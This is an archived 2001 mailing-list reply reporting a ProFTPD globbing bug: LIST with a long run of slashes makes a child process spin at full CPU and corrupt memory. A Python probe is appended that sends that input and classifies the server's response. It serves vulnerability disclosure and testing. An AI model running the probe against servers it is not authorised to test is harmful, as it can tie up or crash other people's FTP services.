Re: ProFTPD - Problems in file globbing, gives segmentation fault.

From: Moritz Grimm (gtgbrat_private)
Date: Wed Dec 19 2001 - 18:36:35 PST

    Mattias _ wrote:
    > AFFECTED VERSIONS
    > =================
    > ProFTPD 1.2.4
    > ProFTPD 1.2.2rc3
    > (Others may be affected as well.)
    > 
    > SYSTEMS
    > =======
    > This is tested on Slackware 8.
    > 
    > IMPACT
    > ======
    > The ftpd-child dies with signal 11 (SEGV), but the server stays up.
    > The question is whether it's possible to do something nasty with this!?
    
    I'm running ProFTPD 1.2.2 under OpenBSD 2.8.
    
    The following happened when I tried it locally:
    
    <snip>
    Connected to localhost.
    220 FTP Server ready.
    Name (localhost:maxx): 
    331 Password required for maxx.
    Password:
    230 User maxx logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls ////////////////////////////
    500 EPSV not understood.
    227 Entering Passive Mode (127,0,0,1,134,172).
    150 Opening ASCII mode data connection for file list
    
    ^C
    receive aborted
    waiting for remote to finish abort.
    421 Service not available, remote server has closed connection.
    </snip>
    
    The logs show the following many times:
    
    Dec 20 01:27:13 phoenix proftpd in free(): warning: modified (chunk-)
    pointer.
    Dec 20 01:27:13 phoenix proftpd in free(): warning: junk pointer, too
    high to make sense.
    Dec 20 01:27:13 phoenix proftpd in free(): warning: junk pointer, too
    low to make sense.
    
    Neither the server nor the child died. After getting disconnected, the child
    process was still there and I had to kill -9 it. While it was running,
    the computer showed symptoms of 100% CPU usage. Everything became pretty
    slow, but not unusable (no real DoS). After killing the child,
    everything went back to normal.
    
    I wasn't able to remotely reproduce this behavior. Here's what happened
    when using the Win2000 command line ftp from another box:
    
    <snip>
    230 Anonymous access granted, restrictions apply.
    ftp> ls ////////////////////////////
    200 PORT command successful.
    150 Opening BINARY mode data connection for file list.
    /////////////////////////////uploads
    /////////////////////////////welcome.msg
    /////////////////////////////pub
    /////////////////////////////tmp
    226 Transfer complete.
    FTP: 148 bytes received in 0.07 seconds 2.11KB/s
    </snip>
    
    This time, nothing weird happened.
    
    I hope this is of some use to you.
    
    
    Moritz
    
    -- 
    _______________________________________________________________________
    "They who would give up an essential liberty for temporary security,
    deserve neither liberty nor security" - Benjamin Franklin
    
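A probe for the behaviour reported in this thread, added here as an example; it is not part of Moritz's post and not ProFTPD code. It logs in, sends LIST with a run of forward slashes like the `ls ////...` above, and classifies what comes back: a normal listing (what the Win2000 client got), a 421 or dropped control connection (what happened locally on OpenBSD), a hang with an open data connection until the timeout (the spinning child), or an ordinary FTP error such as 550. `PROBE_HOST`, the anonymous credentials and the timeout are placeholders (assumptions); only Python's standard `ftplib` is used.

```python
"""Probe an FTP server with the long-slash LIST argument from the thread.

Added example, not from the original post or from ProFTPD. PROBE_HOST,
the anonymous credentials and the timeout are placeholders (assumptions):
point them at a test server you are allowed to probe before running this.
"""
import ftplib
import socket

# Outcome labels for a single probe.
LISTING = "listing"    # a directory listing came back (the remote Win2000 case above)
CLOSED = "closed"      # 421 or dropped control connection (the local OpenBSD case above)
HUNG = "hung"          # data connection opened but no data before the timeout: child spinning
REJECTED = "rejected"  # an ordinary FTP error such as 550: the server handled the path

# Placeholder target (assumption); replace with a host you are allowed to test.
PROBE_HOST = "ftp.example.invalid"


def make_glob_path(slashes):
    """Build the LIST argument used in the thread: a run of N forward slashes."""
    if slashes < 1:
        raise ValueError("need at least one slash")
    return "/" * slashes


def classify(lines, exc):
    """Map the result of one LIST attempt to an outcome label.

    lines: listing lines collected before anything went wrong
    exc:   the exception raised by ftplib/socket, or None on success
    """
    if exc is None:
        return LISTING
    # socket.timeout is an alias of TimeoutError on Python >= 3.10; check both.
    if isinstance(exc, (socket.timeout, TimeoutError)):
        return HUNG
    if isinstance(exc, (EOFError, ConnectionResetError, BrokenPipeError)):
        return CLOSED
    if isinstance(exc, ftplib.error_temp) and str(exc).startswith("421"):
        return CLOSED
    if isinstance(exc, ftplib.Error):
        return REJECTED
    # Any other OSError (connection refused, DNS failure) is not a verdict on the server.
    raise exc


def probe(host, port=21, user="anonymous", passwd="probe@example.invalid",
          slashes=28, timeout=10.0):
    """Log in, send LIST with a slash run over passive mode, return (outcome, lines)."""
    lines = []
    exc = None
    try:
        with ftplib.FTP() as ftp:
            ftp.connect(host, port, timeout=timeout)   # the timeout also applies to data sockets
            ftp.login(user, passwd)
            ftp.set_pasv(True)
            ftp.retrlines("LIST " + make_glob_path(slashes), lines.append)
    except (OSError, EOFError, ftplib.Error) as e:
        exc = e
    return classify(lines, exc), lines


if __name__ == "__main__":
    # A few run lengths; the thread used a run of roughly 28 slashes.
    for n in (1, 28, 256):
        try:
            outcome, got = probe(PROBE_HOST, slashes=n)
        except OSError as e:
            print("%4d slashes -> could not connect: %s" % (n, e))
            break
        print("%4d slashes -> %-8s (%d listing lines)" % (n, outcome, len(got)))
```

Run it against a server of your own while watching the server's log and process table, as Moritz did: `closed` corresponds to the 421 he saw, and `hung` is the case where the child stays alive at 100% CPU and has to be killed by hand. A `rejected` result means the server refused the path cleanly, which is the outcome a fixed build should give.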



    This archive was generated by hypermail 2b30 : Thu Dec 20 2001 - 17:44:49 PST